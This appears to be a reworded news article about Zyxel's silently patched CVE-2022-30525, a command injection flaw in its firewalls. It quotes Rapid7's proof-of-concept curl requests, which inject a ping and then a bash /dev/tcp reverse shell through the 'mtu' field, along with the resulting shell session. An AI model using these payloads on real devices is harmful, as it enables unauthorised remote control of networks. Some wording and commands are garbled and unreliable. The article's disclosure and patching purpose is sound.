Zyxel silently fixes command injection vulnerability with a severity rating of 9.8



Hardware maker Zyxel has quietly released an update that fixes a critical vulnerability that gives hackers the ability to remotely control tens of thousands of firewall devices.

The vulnerability, which allows remote command injection with no authentication required, carries a severity rating of 9.8 out of a possible 10. It is easy to exploit by sending simple HTTP or HTTPS requests to the relevant devices. Requests allow hackers to send commands or open a shell web interface that allows hackers to retain privileged access over time.

High value, easy to weaponize, requires no authentication

The vulnerability affects a range of firewalls that offer a feature known as zero-touch provisioning. Zyxel markets the devices for use in small branch and corporate office deployments. The devices provide VPN connectivity, SSL inspection, web filtering, intrusion protection and email security and deliver up to 5 Gbps throughput through the firewall. The Shodan device search service shows that more than 16,000 affected devices are exposed to the internet.

The specific devices affected are:

Applicable model Affected Firmware Version
USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 to ZLD5.21 Patch 1
USG20-VPN, USG20W-VPN ZLD5.10 to ZLD5.21 Patch 1
ATP 100, 200, 500, 700, 800 ZLD5.10 to ZLD5.21 Patch 1

The vulnerability is tracked as CVE-2022-30525. Rapid7, the security company that discovered it and privately reported it to Zyxel, said the VPN series of devices also support ZTP, but they aren’t vulnerable because they don’t include ZTP. other features required. In a notice published on ThursdayRapid7 researcher Jake Baines wrote:

The affected models are vulnerable to the injection of unauthenticated and remote commands via the administrative HTTP interface. Commands are executed as nobody user. This vulnerability is exploited by the /ztp/cgi-bin/handler URI and is the result of passing unfiltered attacker input into the os.system method in lib_wan_settings.py. The vulnerable feature is called in association with the setWanPortSt ordered. An attacker can inject arbitrary commands into the mtu or the data setting.

Here are examples of (1) curl which forces the firewall to run a ping from to IP address, followed by (2) the powershell showing the results, (3) creating a reverse shell, and (4) what a hacker can do with the reverse shell:

    1. curl -v --insecure -X POST -H "Content-Type: application/json" -d
      :"1","vlanid":"5","mtu":"; ping;","data":"hi"}'
    2. nobody   11040  0.0  0.2  21040  5152 ?        S    Apr10   0:00  _ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSL
      nobody   16052 56.4  0.6  18104 11224 ?        S    06:16   0:02  |   _ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.py
      nobody   16055  0.0  0.0   3568  1492 ?        S    06:16   0:00  |       _ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping; 5 >/dev/null 2>&1
      nobody   16057  0.0  0.0   2152   564 ?        S    06:16   0:00  |           _ ping
    3. curl -v --insecure -X POST -H "Content-Type: application/json" -d '
      "1","vlanid":"5","mtu":"; bash -c "exec bash -i &>/dev/tcp/ <&1;";","data":"hi"}'
    4. albinolobster@ubuntu:~$ nc -lvnp 1270
      Listening on 1270
      Connection received on 37882
      bash: cannot set terminal process group (11037): Inappropriate ioctl for device
      bash: no job control in this shell
      bash-5.1$ id
      uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
      bash-5.1$ uname -a
      uname -a
      Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux

Rapid7 has developed a module for the Metasploit operating framework here which automates the mining process.

Baines said Rapid7 notified Zyxel of the vulnerability on April 13 and the two parties agreed to provide a coordinated disclosure, including the patch, on June 21. The researcher went on to say that unbeknownst to Rapid7, the hardware manufacturer released a firmware update. on April 28 which quietly patched the vulnerability. Zyxel only got the CVE number on Tuesday, after Rapid7 asked about the silent patch and posted a advisory Thursday.

According to AttackerKB, a resource on security vulnerabilities, CVE-2022-30525 is of great value to threat actors because it is easy to weaponize, requires no authentication, and can be exploited in the default configuration of vulnerable devices. Rapid7 representatives were unavailable to answer basic questions about the accuracy of this assessment.

Administrators must manually apply the patch unless they have changed the default settings to allow automatic updating. Early indications are that the patch has not been widely deployed, as a Shodan query for just one of the vulnerable firewalls, the ATP200, showed that only around 25% of exposed devices were running the latest firmware.

Vulnerabilities affecting firewalls can be particularly severe because they are located at the outer edge of networks where inbound and outbound traffic flows. Many firewalls can also read the data before it is encrypted. Administrators overseeing networks using these affected devices should investigate their exposure to this vulnerability as a priority and remediate accordingly.


About Author

Comments are closed.